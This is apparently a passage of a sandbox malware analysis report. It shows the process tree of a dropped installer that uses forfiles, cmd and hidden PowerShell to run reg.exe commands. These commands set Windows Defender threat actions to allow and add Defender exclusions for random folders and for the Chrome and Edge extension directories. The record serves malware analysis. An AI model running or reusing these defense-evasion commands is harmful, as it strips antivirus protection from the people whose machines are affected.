                                          C:\Users\Admin\AppData\Local\Temp\7zS8B05.tmp\Install.exe Nh /OOdidXZm 385107 /S
                                          1⤵
                                          • Executes dropped EXE
                                          • Drops desktop.ini file(s)
                                          • Drops file in System32 directory
                                          • System Location Discovery: System Language Discovery
                                          • Modifies data under HKEY_USERS
                                          PID:5572
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                            2⤵
                                              PID:1476
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                3⤵
                                                • Indirect Command Execution
                                                • System Location Discovery: System Language Discovery
                                                PID:5280
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                  4⤵
                                                    PID:4444
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                      5⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2076
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                  3⤵
                                                  • Indirect Command Execution
                                                  PID:5636
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:3496
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                      5⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:5484
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                  3⤵
                                                  • Indirect Command Execution
                                                  PID:4700
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:5524
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                      5⤵
                                                        PID:2132
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                    3⤵
                                                    • Indirect Command Execution
                                                    PID:5132
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                      4⤵
                                                        PID:2248
                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                          5⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2588
                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                      3⤵
                                                      • Indirect Command Execution
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1108
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                        4⤵
                                                          PID:3288
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                            5⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Drops file in System32 directory
                                                            • Modifies data under HKEY_USERS
                                                            PID:5996
                                                            • C:\Windows\SysWOW64\gpupdate.exe
                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                              6⤵
                                                                PID:5420
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                        2⤵
                                                        • Drops file in System32 directory
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies data under HKEY_USERS
                                                        PID:2116
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                          3⤵
                                                            PID:3388
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3340
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                            3⤵
                                                              PID:1760
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                              3⤵
                                                                PID:2816
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                3⤵
                                                                  PID:5936
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:4656
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                    PID:2600
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                    3⤵
                                                                      PID:2664
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                        PID:5136
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:3100
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:1360
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:4512
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                            3⤵
                                                                              PID:3736
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                              3⤵
                                                                                PID:6096
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                3⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:396
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                3⤵
                                                                                  PID:5056
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                  3⤵
                                                                                    PID:2232
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                    3⤵
                                                                                      PID:5336
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                      3⤵
                                                                                        PID:1244
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                        3⤵
                                                                                          PID:6056
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                          3⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:6064
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                          3⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:4528
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                          3⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:5392
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                          3⤵
                                                                                            PID:1724
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                            3⤵
                                                                                              PID:4536
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                              3⤵
                                                                                                PID:1776
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                3⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:5348
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                3⤵
                                                                                                  PID:3804
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                  3⤵
                                                                                                    PID:6092
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KyxSFeCZlWUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KyxSFeCZlWUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RYdJJCkyJBSgC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RYdJJCkyJBSgC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bOqmECQdU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bOqmECQdU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cHvnXSnMjKzU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cHvnXSnMjKzU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\khFebLVwtrnGgoylwZR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\khFebLVwtrnGgoylwZR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\RrGOVXuIpcMIbrVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\RrGOVXuIpcMIbrVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\lIHFFsfKyjyLqsRzk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\lIHFFsfKyjyLqsRzk\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WOZjflCZCOyVKBHr\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WOZjflCZCOyVKBHr\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                  2⤵
                                                                                                  • Drops file in System32 directory
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:1916
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KyxSFeCZlWUn" /t REG_DWORD /d 0 /reg:32
                                                                                                    3⤵
                                                                                                      PID:2292
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KyxSFeCZlWUn" /t REG_DWORD /d 0 /reg:32
                                                                                                        4⤵
                                                                                                          PID:5080
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KyxSFeCZlWUn" /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                          PID:4928
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RYdJJCkyJBSgC" /t REG_DWORD /d 0 /reg:32
                                                                                                          3⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:5300
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RYdJJCkyJBSgC" /t REG_DWORD /d 0 /reg:64
                                                                                                          3⤵
                                                                                                            PID:2276
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bOqmECQdU" /t REG_DWORD /d 0 /reg:32
                                                                                                            3⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:1396
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bOqmECQdU" /t REG_DWORD /d 0 /reg:64
                                                                                                            3⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:5196
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cHvnXSnMjKzU2" /t REG_DWORD /d 0 /reg:32
                                                                                                            3⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:5324
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cHvnXSnMjKzU2" /t REG_DWORD /d 0 /reg:64
                                                                                                            3⤵
                                                                                                              PID:2332
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\khFebLVwtrnGgoylwZR" /t REG_DWORD /d 0 /reg:32
                                                                                                              3⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:1064
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\khFebLVwtrnGgoylwZR" /t REG_DWORD /d 0 /reg:64
                                                                                                              3⤵
                                                                                                                PID:448
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\RrGOVXuIpcMIbrVB /t REG_DWORD /d 0 /reg:32
                                                                                                                3⤵
                                                                                                                  PID:4992
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\RrGOVXuIpcMIbrVB /t REG_DWORD /d 0 /reg:64
                                                                                                                  3⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:2896
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                  3⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:2656
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                  3⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:4972
